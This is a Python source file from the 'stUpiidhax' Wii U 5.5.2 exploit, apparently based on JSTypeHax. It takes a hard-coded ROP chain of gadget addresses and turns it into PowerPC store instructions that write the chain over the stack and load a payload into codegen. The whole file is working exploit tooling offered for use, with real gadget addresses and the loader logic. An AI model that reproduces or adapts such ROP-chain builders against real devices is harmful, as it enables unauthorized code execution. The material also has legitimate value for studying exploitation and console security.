stUpiidhax, the Wii U 5.5.2 exploit (based on JSTypeHax) http://stupiid.ovh/

ropChainToAsm.py 2.6KB

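# Assemble a ROP chain into semi-optimized PowerPC that writes it over the stack.
# ROP chain based on yellows8's wiiuhaxx_common for loading into codegen.
# FFFF2222 is a stand-in for the payload load address (already held in r7).
# FFFF3333 is a stand-in for the payload size (already held in r11).
# Paste the printed output at "found:" in codeloader.s.
# This ROP chain was created in ropchainBuilder.html using:
#   ropgen_copycodebin_to_codegen(0x01800000, 0xFFFF2222, 0xFFFF3333)
#   ropchain_appendu32(0x01800000)

# Placeholder words that must NOT be hard-coded into the loader: the real value
# is in a register at run time, so the store reads that register directly.
PLACEHOLDER_REGISTERS = {
    'FFFF2222': 'r7',   # payload load address
    'FFFF3333': 'r11',  # payload size
}
# Register used to materialise every other (constant) word before storing it.
SCRATCH_REGISTER = 'r10'
# Base register of the stores: the chain is written relative to r1 (the stack pointer).
STACK_REGISTER = 'r1'

# One 32-bit stack slot per entry, eight hex digits each, in stack order.
ropChain = [
    '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000',
    '00000000', '0107DD70', '010376C0', '00000000', '00000000', '00000000',
    '00000000', '01080274', '00000000', '00000000', '00000000', '00000000',
    '00000000', '010204C8', '00000000', '00000000', '00000000', 'FFFF3333',
    '00000000', '0107DD70', '01035FC8', '01800000', '00000000', 'FFFF2222',
    '00000000', '01080274', '00000000', '00000000', '00000000', '00000000',
    '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000',
    '00000000', '0107DD70', '010376C0', '00000001', '00000000', '00000000',
    '00000000', '01080274', '00000000', '00000000', '00000000', '00000000',
    '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000',
    '00000000', '0107DD70', '01023F88', '01800000', '00000000', 'FFFF3333',
    '00000000', '01080274', '00000000', '00000000', '00000000', '00000000',
    '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000',
    '00000000', '0107DD70', '010240B0', '01800000', '00000000', 'FFFF3333',
    '00000000', '01080274', '00000000', '01800000',
]


def _check_word(word):
    """Return *word* unchanged after checking it is exactly eight hex digits.

    Slicing an entry into halfwords silently produces garbage otherwise, so a
    typo in the chain would become a wrong store instead of an error.

    Raises:
        ValueError: if *word* is not eight hexadecimal characters.
    """
    if len(word) != 8 or not all(c in '0123456789abcdefABCDEF' for c in word):
        raise ValueError('ROP chain entry %r is not 8 hex digits' % (word,))
    return word


def _load_word(word):
    """Return the PowerPC lines that put the constant *word* into SCRATCH_REGISTER.

    'li' takes a sign-extended 16-bit immediate, so it is only correct when the
    upper halfword is zero AND bit 15 of the lower halfword is clear (< 0x8000);
    'li r10, 0xFFFF' would yield 0xFFFFFFFF, not 0x0000FFFF. Every other value
    is built with 'lis' (upper halfword << 16) plus 'ori' when the lower
    halfword is non-zero.
    """
    hi, lo = word[:4], word[4:]
    if hi == '0000' and int(lo, 16) < 0x8000:
        return ['li %s, 0x%s' % (SCRATCH_REGISTER, lo)]
    lines = ['lis %s, 0x%s' % (SCRATCH_REGISTER, hi)]
    if lo != '0000':
        lines.append('ori %s, %s, 0x%s' % (SCRATCH_REGISTER, SCRATCH_REGISTER, lo))
    return lines


def rop_chain_to_asm(chain, stack_register=STACK_REGISTER):
    """Return the assembly lines that write *chain* onto the stack.

    Each distinct word is loaded once (or taken from its placeholder register)
    and then stored to every slot it occupies, at offset ``4 * index`` from
    *stack_register*, so repeated values are not reloaded.

    Args:
        chain: ROP chain words, eight hex digits each, in stack order.
        stack_register: base register for the 'stw' instructions.

    Returns:
        list of assembly source lines, without trailing newlines.

    Raises:
        ValueError: if an entry is not eight hex digits.
    """
    words = [_check_word(w) for w in chain]
    output = []
    seen = set()
    for word in words:
        if word in seen:
            continue
        seen.add(word)
        if word in PLACEHOLDER_REGISTERS:
            source = PLACEHOLDER_REGISTERS[word]
        else:
            output.extend(_load_word(word))
            # Re-select the scratch register for EVERY constant: the original
            # only did so on the 'li' path, so a constant that followed a
            # placeholder was stored from the stale r7/r11.
            source = SCRATCH_REGISTER
        for slot, other in enumerate(words):
            if other == word:
                output.append('stw %s, 0x%X(%s)' % (source, slot * 4, stack_register))
    return output


def main():
    """Print the loader stub for the hard-coded chain above, one instruction per line."""
    for line in rop_chain_to_asm(ropChain):
        print(line)


if __name__ == '__main__':
    main()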